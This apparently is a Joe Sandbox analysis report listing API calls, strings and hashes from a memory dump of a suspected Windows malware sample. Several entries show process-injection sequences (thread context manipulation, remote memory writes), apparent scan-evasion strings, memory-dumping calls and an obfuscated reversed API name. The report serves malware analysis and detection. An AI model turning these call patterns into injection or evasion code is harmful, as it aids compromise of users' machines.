                                                                        • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                        • Instruction ID: 1fb9746f026ce6f02ea31d5bc0eb9347db5992d369609ce569450f4ad87dcc6e
                                                                        • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                        • Instruction Fuzzy Hash: D2A011A8000A220A8A2A2A28082022A2A322EC0200388C0A88A000A0028E2AC080A828
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C51A03), ref: 02C515E2
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: db963b57d7ef63c3f1de3644e080dbfe5d1ea751b856e170bfdf18fa533a27a4
                                                                        • Instruction ID: 34b7319684b887777c2c7d4715ee8c5346d4ecfdc0abad0f033984a1db881fcd
                                                                        • Opcode Fuzzy Hash: db963b57d7ef63c3f1de3644e080dbfe5d1ea751b856e170bfdf18fa533a27a4
                                                                        • Instruction Fuzzy Hash: 93F049F0B423004FDB19CFB999843027AE2E78A345F158679D709DB388EBB18401CF04
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02C516A4
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: f8f860cccfe07de5303ebbca823ef7100e01514f163935e84ce7544e683da368
                                                                        • Instruction ID: eb28abbd39e959db9c24ee3eb04387ddcb7cc42bff1a7e57922c0b3307c89f92
                                                                        • Opcode Fuzzy Hash: f8f860cccfe07de5303ebbca823ef7100e01514f163935e84ce7544e683da368
                                                                        • Instruction Fuzzy Hash: 5AF090B2A416A96BD7109E5AACC4792BB98FB40314F160239EA0CD7340D7B0A850CB98
                                                                        APIs
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C51FE4), ref: 02C51704
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: 01441dc93676877d918ea675a5c0997b56698b0f40d06fb54c210243191ca064
                                                                        • Instruction ID: 4f51ccd60e68b623f38f870343450609f3041fe81b00a9210add60bb7cdb422b
                                                                        • Opcode Fuzzy Hash: 01441dc93676877d918ea675a5c0997b56698b0f40d06fb54c210243191ca064
                                                                        • Instruction Fuzzy Hash: 7FE086753403216FD7105A7E5D887526BDCEB44664F284475F909DB241D6E0E850CB68
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                        • API String ID: 667068680-597814768
                                                                        • Opcode ID: 5cfc946d253169d807c6bea42c969f3e75dcd139b1c216f2ed47cb00a32e6d8d
                                                                        • Instruction ID: c1266610fc37ce4f441e75ec54bac9357dfa8fd5e75933b8d7f5bac4cbc08538
                                                                        • Opcode Fuzzy Hash: 5cfc946d253169d807c6bea42c969f3e75dcd139b1c216f2ed47cb00a32e6d8d
                                                                        • Instruction Fuzzy Hash: 7431AFB0A81660AFEF10EFB4D8C9B2977EDAB157017500E65E802DF204EB75E854DF16
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C68788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                        • GetThreadContext.KERNEL32(00000000,02CD7424,ScanString,02CD73A8,02C6A93C,UacInitialize,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,UacInitialize,02CD73A8), ref: 02C69602
                                                                          • Part of subcall function 02C67A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        • SetThreadContext.KERNEL32(00000000,02CD7424,ScanBuffer,02CD73A8,02C6A93C,ScanString,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,00000000,-00000008,02CD74FC,00000004,02CD7500), ref: 02C6A317
                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02CD7424,ScanBuffer,02CD73A8,02C6A93C,ScanString,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,00000000,-00000008,02CD74FC), ref: 02C6A324
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                        • API String ID: 2624078988-51457883
                                                                        • Opcode ID: 96d24af4ee5b881e00082843f03e3bba74d167f591a2802ae39c042361b6cb3f
                                                                        • Instruction ID: 97d578f794351447a35f57304317beb61b04dc37fe7b89e9d5fd5d7b163afdef
                                                                        • Opcode Fuzzy Hash: 96d24af4ee5b881e00082843f03e3bba74d167f591a2802ae39c042361b6cb3f
                                                                        • Instruction Fuzzy Hash: 96E2FD35A405289BDB25FF64DCC5BDEB3BAEF84300F5041A1A505AB214DA30EEC9EF59
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C68788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                        • GetThreadContext.KERNEL32(00000000,02CD7424,ScanString,02CD73A8,02C6A93C,UacInitialize,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,UacInitialize,02CD73A8), ref: 02C69602
                                                                          • Part of subcall function 02C67A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                        • API String ID: 4276370345-51457883
                                                                        • Opcode ID: d449eac1a037783d424b4167aff9eefb060da1fcc5030f1ded95114372756113
                                                                        • Instruction ID: a64c8dee16859f6869c2b3f9f5b922f286a7b26e8c5f1ef2cb5e048f2330a4ed
                                                                        • Opcode Fuzzy Hash: d449eac1a037783d424b4167aff9eefb060da1fcc5030f1ded95114372756113
                                                                        • Instruction Fuzzy Hash: 38E2FD34A405289BDB25FF64DCC5BDEB3BAEF84300F5041A1A505AB214DA30EEC9EF59
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55925
                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C5593C
                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02C5596C
                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C559D0
                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A06
                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A19
                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A2B
                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A37
                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000), ref: 02C55A6B
                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14), ref: 02C55A77
                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C55A99
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                        • API String ID: 3245196872-1565342463
                                                                        • Opcode ID: d06b2faa21d353de5f62ca2e0e9c25f69ac55a9a2aebd594b1e91d8ebdff7c14
                                                                        • Instruction ID: 45849707c41d6400e2039e6d75e94e22cfe07e8181cf47891d2e91eac5f9f7f6
                                                                        • Opcode Fuzzy Hash: d06b2faa21d353de5f62ca2e0e9c25f69ac55a9a2aebd594b1e91d8ebdff7c14
                                                                        • Instruction Fuzzy Hash: BD418F71D40229AFDB10DAE8CC88AEEB3BDAF44390F4405A5A948E7201D774DB848F58
                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C55BE8
                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C55BF5
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C55BFB
                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C55C26
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55C6D
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55C7D
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55CA5
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55CB5
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C55CDB
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C55CEB
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1599918012-2375825460
                                                                        • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                        • Instruction ID: 6bdb5e590d3bb231e13c6f03ce4d4ebca02acabe05e45bc620f467297f267f19
                                                                        • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                        • Instruction Fuzzy Hash: 5A318471E4067C2AEB25DAB48C49BDE76AD9B443C0F4401E19E09E6181EAB4EBC48F59
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C68539
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$MemoryProtectVirtual
                                                                        • String ID: ntdll$yromeMlautriVtcetorPtN
                                                                        • API String ID: 3897345246-351734974
                                                                        • Opcode ID: be546113e427b7881e5b490a4cef6077d749d64e41b33b29c744399d7165ad86
                                                                        • Instruction ID: 558e1feb51e0852647f39533fae31af030f84c1517bdf7832426ad2df3a9b6f8
                                                                        • Opcode Fuzzy Hash: be546113e427b7881e5b490a4cef6077d749d64e41b33b29c744399d7165ad86
                                                                        • Instruction Fuzzy Hash: 12015EB4640208AFEB14EFA8DC85FAEB7EEEB48700F504A61B904D7600D630ED58DF24
                                                                        APIs
                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C57FF5
                                                                        Similarity
                                                                        • API ID: DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1705453755-0
                                                                        • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                        • Instruction ID: 2aa5c7a3d4f9bf4bf3f70d817d8d7b649ad2917c443912f496613100e26ea039
                                                                        • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                        • Instruction Fuzzy Hash: E411D2B5E00209AF9B44CF99C881DAFF7F9FFC8300B54C559A909E7254E6719A418B90
                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                        • Instruction ID: 86344db4d9f305e118bcc336c24d0db98217b8548c3000d9a653f51dacdc2138
                                                                        • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                        • Instruction Fuzzy Hash: 90E0927170022817D715A95A9C80EE6725D9B58310F40426AAD05C7385EDA0DEC04AEC
                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,02C7D106,00000000,02C7D11E), ref: 02C5B79A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Version
                                                                        • String ID:
                                                                        • API String ID: 1889659487-0
                                                                        • Opcode ID: dcec8c46fabb3f5b90f3e3f2479464d59cf6ec36139a4c688b6871a4c56710ff
                                                                        • Instruction ID: 580e0c0a07614d4373e568804a023e4060cca30e4cb099d534fe3ee85b9f5578
                                                                        • Opcode Fuzzy Hash: dcec8c46fabb3f5b90f3e3f2479464d59cf6ec36139a4c688b6871a4c56710ff
                                                                        • Instruction Fuzzy Hash: 99F017759043118FD350DF28D4417157BE9FB88744F014EA8EA98C7390E734D858CF66
                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C5BE72,00000000,02C5C08B,?,?,00000000,00000000), ref: 02C5A823
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                        • Instruction ID: 4259f27140beb3aefeb49c89670cfdeb8460793709dc9d6e3dc2b366ffc68e9b
                                                                        • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                        • Instruction Fuzzy Hash: 87D05EA230E2702AA210915B2D84D7B5ADCCEC57A1F50413AFE88C6201D214CC47DAB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID:
                                                                        • API String ID: 481472006-0
                                                                        • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                        • Instruction ID: aa5316fc1f9f8a819b8099175e6109c32c8555ad4f503dea0cdcddfedd8b6360
                                                                        • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                        • Instruction Fuzzy Hash: 66A0124040483081854033180C0253430845810A20FD48740ACF8402D0ED2D41609097
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C5D29D
                                                                          • Part of subcall function 02C5D268: GetProcAddress.KERNEL32(00000000), ref: 02C5D281
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                        • API String ID: 1646373207-1918263038
                                                                        • Opcode ID: 3058371ee57deff33f0d94b10854a17ed41211ae19cfd605f2fc679733851262
                                                                        • Instruction ID: f09d7f12471ce5ae38aa84f93e2ad056754371833503fccbbc675e574aea6743
                                                                        • Opcode Fuzzy Hash: 3058371ee57deff33f0d94b10854a17ed41211ae19cfd605f2fc679733851262
                                                                        • Instruction Fuzzy Hash: 4541A9E1A893B89A52046B6D7800627B7DED644B143E0461BFC06CBB85DE30FDD5DA2E
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C66EDE
                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02C66EEF
                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02C66EFF
                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02C66F0F
                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02C66F1F
                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02C66F2F
                                                                        • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02C66F3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                        • API String ID: 667068680-2233174745
                                                                        • Opcode ID: fb7f1c393162f5f29696cf19941adf459450c40c7e6849b77adf9a19cc713e53
                                                                        • Instruction ID: 55614569a86ecc2f64508c0729a318d68cfaf1e5c86db557b25420402588ae74
                                                                        • Opcode Fuzzy Hash: fb7f1c393162f5f29696cf19941adf459450c40c7e6849b77adf9a19cc713e53
                                                                        • Instruction Fuzzy Hash: 7CF04CE1AC83607DBB00BB745CC9A362F9DB9206143701E75ED0359542EE7AD4589F1A
                                                                        APIs
                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C528CE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
